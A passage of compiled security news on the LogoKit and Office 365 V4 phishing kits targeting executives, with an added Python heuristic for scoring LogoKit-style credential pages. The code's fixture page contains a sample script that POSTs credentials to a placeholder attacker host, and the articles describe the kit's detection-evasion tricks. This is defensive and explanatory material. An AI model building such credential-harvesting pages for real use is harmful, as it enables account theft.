Furthermore, since LogoKit is a collection of JavaScript files, its resources can also
be hosted on public trusted services like Firebase, GitHub, Oracle Cloud, and
others, most of which will be whitelisted inside corporate environments and trigger
little alerts when loaded inside an employee's browser.

RiskIQ said it’s tracking this new threat closely due to the kit’s simplicity, which the
security firm believes helps improve its chances of a successful phish.
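The traits described above (the recipient's address carried in the link, a logo fetched from a third-party logo service for that address's domain, a login form that posts off-site, hosting on a shared trusted platform) can be turned into a page-scoring heuristic for a URL-analysis pipeline. The Python below is an added example, not RiskIQ's code; the URL, HTML fixtures, hostnames and the `collect.example.invalid` endpoint are all constructed placeholders.

```python
"""Heuristic scoring of LogoKit-style credential pages (added example, not
RiskIQ's code).

Given a URL and the HTML it served, count the traits the report describes: the
recipient's e-mail carried in the link, a logo pulled from a third-party logo
service for that e-mail's domain, a password field, and form or fetch()
targets on a host other than the page's own. Fixtures below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

EMAIL_RE = re.compile(r"[\w.+-]+@(?:[\w-]+\.)+[A-Za-z]{2,}")
LOGO_SERVICES = ("logo.clearbit.com", "www.google.com/s2/favicons")
# Shared hosting the report names as generally trusted inside corporate networks.
SHARED_HOSTING = ("firebaseapp.com", "web.app", "github.io", "oraclecloud.com")
FETCH_RE = re.compile(r"""(?:fetch\(|\.open\(\s*["']\w+["']\s*,)\s*["']([^"']+)["']""")


class _PageFacts(HTMLParser):
    """Collect password inputs, form actions, image sources and script text."""
    def __init__(self):
        super().__init__()
        self.password_field, self._in_script = False, False
        self.actions, self.img_srcs, self.script = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_field = True
        elif tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "img" and a.get("src"):
            self.img_srcs.append(a["src"])
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script.append(data)


def analyze(url: str, html: str) -> dict:
    """Return the number of indicators found and the reasons behind it."""
    parts = urlsplit(url)
    page_host = (parts.hostname or "").lower()
    reasons = []
    m = EMAIL_RE.search(unquote(f"{parts.path}?{parts.query}#{parts.fragment}"))
    victim_domain = m.group(0).split("@")[1].lower() if m else None
    if victim_domain:
        reasons.append("recipient e-mail embedded in URL")
    facts = _PageFacts()
    facts.feed(html)
    if facts.password_field:
        reasons.append("password field present")
    logo_hits = [s for s in facts.img_srcs if any(v in s for v in LOGO_SERVICES)]
    if logo_hits:
        reasons.append("logo fetched from third-party logo service")
        if victim_domain and any(victim_domain in s for s in logo_hits):
            reasons.append("logo domain matches e-mail domain in URL")
    for target in facts.actions + FETCH_RE.findall("".join(facts.script)):
        host = urlsplit(target).hostname
        if host and host.lower() != page_host:
            reasons.append(f"credentials posted off-site to {host}")
            break
    if victim_domain and any(page_host.endswith(h) for h in SHARED_HOSTING) \
            and not page_host.endswith(victim_domain):
        reasons.append("hosted on shared platform unrelated to the brand")
    return {"score": len(reasons), "reasons": reasons, "victim_domain": victim_domain}


# Constructed fixtures: a LogoKit-like page and a legitimate login page.
PHISH_URL = "https://docs-view.firebaseapp.com/secure/index.html#alice@acme-corp.example"
PHISH_HTML = """<html><body>
<img src="https://logo.clearbit.com/acme-corp.example" alt="logo">
<form id="f"><input name="email"><input type="password" name="pw"></form>
<script>fetch("https://collect.example.invalid/p", {method: "POST"});</script>
</body></html>"""
LEGIT_URL = "https://login.acme-corp.example/"
LEGIT_HTML = """<html><body><img src="/static/logo.png"><form action="/auth">
<input name="email"><input type="password" name="pw"></form></body></html>"""

if __name__ == "__main__":
    print(analyze(PHISH_URL, PHISH_HTML))
    print(analyze(LEGIT_URL, LEGIT_HTML))
```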

4. Phishing scheme shows CEOs may be ‘most valuable asset,’ and ‘greatest vulnerability’

Cybercriminals have been using a phishing kit featuring fake Office 365 password
alerts as a lure to target the credentials of chief executives, business owners and
other high-level corporate leaders. The scheme highlights the role and
responsibility upper management plays in ensuring the security of their own
company’s assets.

In a blog post on Monday, researchers from Trend Micro reported that they
uncovered 70 email addresses that have been targeted with the so-called “Office
365 V4 phishing kit” since May 2020, 40 of which belong to “CEOs, directors,
owners and founders, among other enterprise employee[s].”

Ryan Flores, senior manager of forward-looking threat research in APAC region at
Trend Micro, told SC Media that the finding was pretty striking, because typically
you would see a spam or phishing campaign sent to a wide range of email
addresses. But this one was “very deliberate” in that it “only sent to really a few
people in that organization.”

And very high-ranking people at that: Just over 45 percent of targeted individuals
carried the title of CEO. The next most frequently targeted titles were managing
director (9.7%) and CFO (4.8%). The attack has spanned a wide range of industry
sectors, including manufacturing, real estate, finance, government and technology,
and nearly 74% of businesses known to be targeted were located in America.

“Based on the data distribution, CEOs in the U.S. are obviously the main targets of
the threat actors that use the Office 365 V4 phishing kit,” the blog post concluded.
“As seen in this particular campaign, the attackers target high profile employees
who may not be as technically- or cybersecurity-savvy, and may be more likely to
be deceived into clicking on malicious links.”

This is why executives must hold themselves to the same security standards that
they would want their own employees to meet.
“CEOs and high-level executives are accustomed to being thought of as an
organization’s biggest asset, while increasingly attackers see them as the greatest
vulnerability,” said Eyal Benishti, CEO at IRONSCALES. “This is a dichotomy
that executives must be humble enough to recognize as true, so that they can play
an active role in their company’s risk mitigation. Overall, CEOs and
other executives must lead from the front and act as a personal example to make
sure everyone sees security as a top priority.”

If these executives are tricked into giving away their passwords via malicious
phishing pages – which are hosted on legitimate sites – then the criminals can use
those passwords “for the purpose of conducting additional phishing attacks,
gaining access to sensitive information or conducting other social engineering
attacks.” Business email compromise (BEC) targeting could occur, as could
impersonation schemes that target other employees and third-party partners, the
blog post noted.

Indeed, Trend Micro pointed to several dark web forums selling compromised
executive Office 365 credentials at a cost of $250 to $500. The company could not
be certain, however, if the V4 phishing kit was involved.

For that reason, “all employees, regardless of company rank, should exercise
caution when reviewing and acting on email prompts for specific actions,
especially from unknown sources,” the blog post cautions.

Unfortunately, this isn’t always an easy lesson to get across. According to Flores,
CEOs and other top executives sometimes view email security mechanisms or
policies as “an inconvenience to them” and because of that, they behave in a way
that is “an exception to the rule.”

“We need to realize that these executives do hold a lot of power,” Flores continued.
“If they get phished, [the attacker] would be able to control the email account of
that particular c-level executive and [be privy to] possible business deals, trade
secrets and whatever other business related things are happening.”

Benishti at IRONSCALES agreed that “there is definitely a subset of executives
and upper-level management in the business world that does not practice what their
organization preaches when it comes to security awareness training.” In many
cases, executives are even granted higher privileges or use their rank to be
excluded from other security controls.

As to why certain executives behave in this risky manner, there are numerous
factors.

“Some still believe that they are immune to being duped, even though they are well
aware that phishing techniques have evolved in sophistication,” said Benishti. “For
others, it’s a matter of prioritization. Very few executives believe that the threats to
their organization are overblown, but they may not have yet experienced a
significant cyber breach, meaning the perception of the risks are not as real or
time-sensitive as they should be.”

Some senior executives also use a personal assistant to go through emails, which
can impact the individual’s ability to spot suspicious messages.

There are organizations out there that hold executives to high security standards.
Brandi Moore, chief operating officer at Cofense, said her company’s customers
“are very engaged with their c-suite, who often play a critical role in promoting the
organization’s phishing threat detection program.

“Many of our clients see the CFO and the finance team as the most frequent
reporters of phishing attacks to their SOC,” she said. “For most of our clients, it’s
much more likely that c-level executives are the biggest fans of the phishing
simulation program versus believing the threat is overblown.”

Moreover, companies can take steps to help educate their executives on targeted
threats by customizing their email security awareness training according to job
function. “Phishing simulations and training must be individually tailored to
specific departments and roles inside the organization in order to achieve its
goals,” said Benishti. “There simply is no one-size-fits-all when it comes to
simulation and training.”

Emails sent as part of the V4 phishing kit scam warned recipients that their Office
365 passwords were about to expire, giving them an option to click on a button that
would allow them to keep their current credentials. But as the Trend Micro blog
post notes, “legitimate service providers and vendors will never ask individual
consumers and enterprise users for details such as account access credentials, and
especially not to retain dated passwords.”

The phishing kit, which is available for sale on the dark web, uses several other
notable tricks to help avoid detection. For starters, most of the emails were sent via
a remote desktop protocol-based virtual private server (VPS) from FireVPS. Flores
said this is to bypass certain blacklists by using innocent-looking IP addresses that
appear to come from a normal laptop or desktop machine.

The phishing kit also has its own blocklist of domain names and IP address ranges
“to ensure that access is blocked when accessed by security companies or large
cloud providers,” the blog post stated. “We assume the intention is to evade
detection by security vendors as the list includes a number of antivirus companies,
Google, Microsoft, VirusTotal, and a long list of other cybersecurity and
technology companies, as well as public blocklisting sites.” Additionally, the
phishing kit can detect bot scans and web crawlers.

5. Targeted Phishing Attacks Strike High-Ranking Company Executives

An evolving phishing campaign observed at least since May 2020 has been found
to target high-ranking company executives across manufacturing, real estate,
finance, government, and technological sectors with the goal of obtaining sensitive
information.

The campaign hinges on a social engineering trick that involves sending emails to
potential victims containing fake Office 365 password expiration notifications as
lures. The messages also include an embedded link to retain the same password
that, when clicked, redirects users to a phishing page for credential harvesting.

"The attackers target high profile employees who may not be as technically or
cybersecurity savvy, and may be more likely to be deceived into clicking on
malicious links," Trend Micro researchers said in a Monday analysis.

"By selectively targeting C-level employees, the attacker significantly increases the
value of obtained credentials as they could lead to further access to sensitive
personal and organizational information, and used in other attacks."

According to the researchers, the targeted email addresses were mostly collected
from LinkedIn, while noting that the attackers could have purchased such target
lists from marketing websites that offer CEO/CFO email and social media profile
data.

The Office 365 phishing kit, currently in its fourth iteration (V4), is said to have
been originally released in July 2019, with additional features added to detect bot
scanning or crawling attempts and provide alternative content when bots are
detected. Interestingly, the alleged developer behind the malware announced V4's
availability on their "business" Facebook page in mid-2020.

Aside from selling the phishing kit, the actor has also been found to peddle account
credentials of CEOs, chief financial officers (CFOs), finance department members,
and other high-profile executives on social media pages.
What's more, Trend Micro's investigation unearthed a possible link to a user handle
on underground forums that was spotted selling a credential harvester tool as well
as stolen C-level account passwords for anywhere between $250 and $500.

The researchers uncovered at least eight compromised phishing sites hosting the
V4 phishing kit, raising the possibility that they were used by different actors for a
wide range of phishing campaigns directed against CEOs, presidents, board
members, and founders of companies located in the U.S., the U.K., Canada,
Hungary, the Netherlands, and Israel.

"While organizations are aware and wary of the information they include in public-
facing websites and platforms, their respective employees should be constantly
reminded to be mindful of the details they disclose on personal pages," the
researchers concluded. "These can be easily used against them for attacks using
social engineering techniques."
